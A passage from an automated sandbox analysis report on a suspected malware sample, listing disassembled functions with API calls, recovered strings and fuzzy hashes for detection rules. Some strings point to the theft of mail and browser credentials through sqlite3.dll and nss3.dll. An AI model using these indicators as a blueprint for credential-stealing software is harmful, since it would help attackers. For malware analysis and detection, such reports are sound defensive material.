                                                                                                              • API ID: _strcmpi
                                                                                                              • String ID: C@$mail.identity
                                                                                                              • API String ID: 1439213657-721921413
                                                                                                              • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                              • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                              Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00406640
                                                                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset$memcmp
                                                                                                              • String ID: Ul@
                                                                                                              • API String ID: 270934217-715280498
                                                                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                              Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                              Strings
                                                                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                              • String ID: recovered %d pages from %s
                                                                                                              • API String ID: 985450955-1623757624
                                                                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                              Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _ultoasprintf
                                                                                                              • String ID: %s %s %s
                                                                                                              • API String ID: 432394123-3850900253
                                                                                                              • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                              • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                              Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                              • sprintf.MSVCRT ref: 0040909B
                                                                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                              • String ID: menu_%d
                                                                                                              • API String ID: 1129539653-2417748251
                                                                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                              Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                              • _mbscat.MSVCRT ref: 004070FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscat$_mbscpystrlen
                                                                                                              • String ID: sqlite3.dll
                                                                                                              • API String ID: 1983510840-1155512374
                                                                                                              • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                              • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                              Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                              • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow
                                                                                                              • String ID: MZ@
                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                              • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                              • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                              • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                              • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                              Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileString
                                                                                                              • String ID: A4@$Server Details
                                                                                                              • API String ID: 1096422788-4071850762
                                                                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                              Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • strlen.MSVCRT ref: 0040849A
                                                                                                              • memset.MSVCRT ref: 004084D2
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,7686EB20,?,00000000), ref: 0040858F
                                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,7686EB20,?,00000000), ref: 004085BA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3110682361-0
                                                                                                              • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                              • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                              Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3510742995-0
                                                                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8